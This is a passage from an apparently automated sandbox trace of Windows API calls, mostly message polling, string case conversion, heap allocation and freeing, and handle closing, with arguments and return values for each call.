lpsz="SSA060070245B") returned 0xd [0197.156] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0197.156] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0197.156] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0197.156] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0197.156] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.157] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0197.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.157] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0197.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.157] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0197.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0197.157] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0197.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.157] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0197.157] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0197.157] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0197.157] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0197.157] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.157] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.158] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.158] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0197.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.158] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0197.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.158] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.158] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0197.159] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.159] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0197.160] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0197.160] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0197.160] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0197.160] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0197.161] FreeLibrary (hLibModule=0x74d40000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0197.161] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0197.161] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0197.161] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0197.162] CloseHandle (hObject=0x294) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0197.162] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0197.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0197.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0197.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0197.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0197.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0197.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0197.164] CloseHandle (hObject=0x268) returned 1 [0198.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0198.263] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0198.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0198.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0198.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0198.265] HeapFree (in: hHeap=0x25c0000, 